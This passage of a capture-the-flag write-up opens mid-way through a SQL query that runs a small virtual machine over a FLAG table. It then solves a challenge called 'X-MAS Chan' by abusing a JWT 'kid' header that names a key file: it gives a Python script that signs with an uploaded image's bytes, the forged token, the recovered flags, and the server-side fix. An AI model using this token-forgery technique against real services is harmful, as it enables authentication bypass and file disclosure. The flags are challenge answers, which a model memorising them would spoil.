                                            SELECT IF(Ord(@e) = @i ^ 0x4c, @f, CHAR(@xx*2.75))), '?') = '0', 0, @pc:=71)
                              WHEN 97 THEN @sp := @sp - 1 
                              WHEN 59 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@pc+2,'</m>'))
                              WHEN 108 THEN @sp := @sp - 1 
                              WHEN 46 THEN @i := @i    - 1 
                              WHEN 115 THEN @n:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 100 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@n,'</m>'))
                              WHEN 55 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@prt,'</m>'))
                              WHEN 19 THEN @sp := 1 
                              WHEN 24 THEN @pc:=92 
                              WHEN 33 THEN @pc:=113 
                              WHEN 29 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',87,'</m>'))
                              WHEN 16 THEN IF((@prt sounds LIKE 'Soiii!'), 0, @pc:=80) 
                              WHEN 119 THEN IF(ascii(@n) = @compareto, @pc:=121, 0) 
                              WHEN 3 THEN @notok := 'Wrong.' 
                              WHEN 42 THEN @pc:=45 
                              WHEN 8 THEN IF(ascii(@e) ^ 32 = 120, 0, @pc:=89) 
                              WHEN 98 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 50 THEN 
                                     ( 
                                            SELECT @i := group_concat(n SEPARATOR '') 
                                            FROM FLAG 
                                            WHERE id IN (14, 
                                                          16, 
                                                          19, 
                                                          22, 
                                                          25, 
                                                          32)) 
                              WHEN 91 THEN @pc:=126 
                              WHEN 117 THEN @compareto:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 34 THEN @sp := @sp - 2 
                              WHEN 84 THEN IF(@x2 = 'e', 0, @pc:=89) 
                              WHEN 37 THEN @i := 13 
                              WHEN 20 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',7,'</m>'))
                              WHEN 63 THEN IF(@rv = instr('t35t', 'm4ch1n3'), @pc:=80, 0) 
                              WHEN 53 THEN IF(strcmp( 
                                     ( 
                                            SELECT LEFT(REPLACE(unhex(REPLACE(hex(RIGHT(quote(mid(make_set(40 | 2,'Ook.','Ook?','Ook!','Ook?', 'Ook!','Ook?','Ook.'), 4)), 12)), '4F6F6B', '2B')), ',+', ''), 3)),
                                     ( 
                                            SELECT group_concat(n SEPARATOR '') 
                                            FROM FLAG 
                                            WHERE id > 28 
                                            AND    id < 32)) NOT LIKE '0', @pc:=89, 0) 
                              WHEN 111 THEN @sp := @sp - 1 
                              WHEN 6 THEN IF(@dat = 'X-MAS', @pc:=80, 0) 
                              WHEN 80 THEN 0 
                              WHEN 112 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 120 THEN @rv := 0 
                              WHEN 90 THEN @out := @notok 
                              WHEN 61 THEN @pc:=113 
                              WHEN 43 THEN 0 
                              WHEN 30 THEN @sp := @sp  + 1 
                              WHEN 101 THEN @sp := @sp + 1 
                              WHEN 52 THEN IF( 
                                               ( 
                                               SELECT IF(substr(@dat, 
                                                      ( 
                                                             SELECT ceiling(ascii(ascii(@F))/2)), 3) =
                                                      ( 
                                                             SELECT name_const('TAO', 'SQL')), 1, 0)) = find_in_set(0,'f,e,e,d'), @pc:=124, 0)
                              WHEN 71 THEN 0 
                              WHEN 9 THEN IF( 
                                              ( 
                                              SELECT n 
                                              FROM FLAG 
                                              WHERE id = 1) = '-', 0, @pc:=89) 
                              WHEN 35 THEN IF(@rv = instr('xbar', 'foobar'), @pc:=80, 0) here
                              WHEN 62 THEN @sp := @sp - 2 
                              WHEN 2 THEN @ok := 'OK.' 
                              WHEN 51 THEN IF(hex(@i) = REPEAT('5F', 6), 0, @pc:=89) 
                              WHEN 88 THEN IF(@x4 = 'd', 0, @pc:=89) 
                              WHEN 109 THEN @n:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 10 THEN 
                                     ( 
                                            SELECT @count := count(*) 
                                            FROM FLAG) 
                              WHEN 1 THEN @strn := 'MySQL' 
                              WHEN 39 THEN 0 
                              WHEN 96 THEN @rv := 1 
                              WHEN 106 THEN @pc:=92 
                              WHEN 114 THEN @get_arg_tmp := @sp-3 
                              WHEN 47 THEN IF(@i > 10, @pc:=39, 0) 
                              WHEN 0 THEN @mem:=concat(@mem,REPEAT('<m></m>',50)) 
                              WHEN 94 THEN @n:=extractvalue(@mem,'/m[$@get_arg_tmp]') 
                              WHEN 60 THEN @sp := @sp + 1 
                              WHEN 99 THEN 0 
                              WHEN 123 THEN @pc:=extractvalue(@mem,'/m[$@sp]') 
                              WHEN 89 THEN 0 
                              WHEN 38 THEN @l := 0 
                              WHEN 113 THEN 0 
                              WHEN 36 THEN IF( 
                                               ( 
                                               SELECT elt(bit_length(bin(12))/32, BINARY(rtrim(concat(reverse(REPEAT(substr(regexp_replace(hex(weight_string(trim(ucase(to_base64(
                                                      ( 
                                                             SELECT concat( 
                                                                    ( 
                                                                           SELECT n 
                                                                           FROM FLAG 
                                                                           WHERE id LIKE '20'), 
                                                                    ( 
                                                                           SELECT n 
                                                                           FROM FLAG 
                                                                           WHERE id IN ('50', 
                                                                                         '51', 
                                                                                         substr('121', 2, 2)))))))))), 'D', 'A'), -16, 16), 1)),
                                                      ( 
                                                             SELECT space(6))))))) = concat_ws('00','A3','43','75','A4',''), 0, @pc:=89)
                              WHEN 13 THEN 
                                     ( 
                                            SELECT @f := n 
                                            FROM FLAG 
                                            WHERE id = 3) 
                              WHEN 44 THEN @l := 1 
                              WHEN 65 THEN @i := 33 
                              WHEN 48 THEN IF(@l > find_in_set('x','a,b,c,d'), @pc:=89, 0) 
                              WHEN 110 THEN @rv := @rv * @n 
                              WHEN 125 THEN @out := @notok 
                              WHEN 127 THEN 0 
                              WHEN 4 THEN @targetsz := 42 
                              WHEN 5 THEN 
                                     ( 
                                            SELECT @dat := coalesce(NULL, NULL, group_concat(n SEPARATOR ''), 'X-MAS') 
                                            FROM FLAG) 
                              WHEN 116 THEN @get_arg_tmp := @sp-2 
                              WHEN 23 THEN @sp := @sp  + 1 
                              WHEN 105 THEN @sp := @sp + 1 
                              WHEN 22 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@pc+2,'</m>'))
                              WHEN 15 THEN @prt := concat( 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 4), 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 7), 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 24)) 
                              WHEN 14 THEN IF(ascii(@e) + ascii(@f) = 153, 0, @pc:=89) 
                              WHEN 54 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id IN (substr(REPEAT(rpad(soundex('doggo'), 2, '?'), 2), 4, 1) * 7 + 1))
                              WHEN 72 THEN @l := @l + 1 
                              WHEN 77 THEN 0 
                              WHEN 118 THEN @rv := 1 
                              WHEN 27 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@prt,'</m>'))
                              WHEN 76 THEN IF(@l > locate(find_in_set('p','abcdefghijklmnoqrstuvwxyz'), '1'), @pc:=124, 0)
                              WHEN 7 THEN 
                                     ( 
                                            SELECT @e := n 
                                            FROM FLAG 
                                            WHERE id = 0) 
                              WHEN 40 THEN 
                                     ( 
                                            SELECT @e := concat( 
                                                   ( 
                                                          SELECT n 
                                                          FROM FLAG 
                                                          WHERE id = @i))) 
                              WHEN 79 THEN @pc:=126 
                              WHEN 124 THEN 0 
                              WHEN 66 THEN @l := 0 
                              WHEN 57 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',52,'</m>'))
                              WHEN 67 THEN 0 
                              WHEN 75 THEN IF(@i < 41, @pc:=67, 0) 
                              ELSE @out 
                       end, 
                       @pc:=@pc+1 
                FROM   ( 
                                  SELECT     (e0.v+e1.v+e2.v+e3.v+e4.v+e5.v+e6.v+e7.v+e8.v+e9.v+e10.v) v
                                  FROM      ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 1 v) e0 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 2 v) e1 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 4 v) e2 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 8 v) e3 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 16 v) e4 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 32 v) e5 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 64 v) e6 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 128 v) e7 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 256 v) e8 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 512 v) e9 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 1024 v) e10 
                                  ORDER BY   v) s) q 
ORDER BY v DESC 
LIMIT    1

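Follow the SELECT query by hand: it is a small virtual machine driven by `@pc`, where each `WHEN` branch acts as one instruction working on rows of the `FLAG` table. Tracing it gives us the flag.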

X-MAS{Wooat???_4_VM_1n_My_SQL???_mnohijkd}

X-MAS Chan

There is a JWT named banner.

// Header
{
  "typ":"JWT",
  "alg":"HS256",
  "kid":"\/tmp\/jwt.key" // Path to the key file.
}

// Body
{
  "banner":"banner\/3.png" // Banner file's path.
}

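The `kid` header is client-controlled and is used as the path of the key file, so we can upload any image file and use that image's bytes as the HMAC key. The server-side fix is to treat `kid` as an opaque identifier looked up in a fixed set of keys, never as a filesystem path.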

import jwt

# Sign with the bytes of a file we uploaded ourselves: per the writeup, the
# token's "kid" header names the file the server reads as the HS256 key.
with open('03sunf.gif', 'rb') as key_file:
    key = key_file.read()

# "kid" is the uploaded image's path on the server; "banner" is the banner
# file's path (here pointed at flag.php instead of an image).
claims = {'banner': 'flag.php'}
header_fields = {'kid': '/var/www/html/b/src/1607782651348.gif'}
token = jwt.encode(claims, key, algorithm='HS256', headers=header_fields)
print(token)
# Defence: resolve "kid" through a fixed allowlist of key ids rather than
# using it as a filesystem path, and validate "banner" against known banners.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L2h0bWwvYi9zcmMvMTYwNzc4MjY1MTM0OC5naWYifQ.eyJiYW5uZXIiOiJmbGFnLnBocCJ9.s6ImAyuDOFMQ_KtFtD3AtVXT2kMIFohKPGNj85tWX-0
X-MAS{n3v3r_trust_y0ur_us3rs_k1ds-b72dcf5a49498400}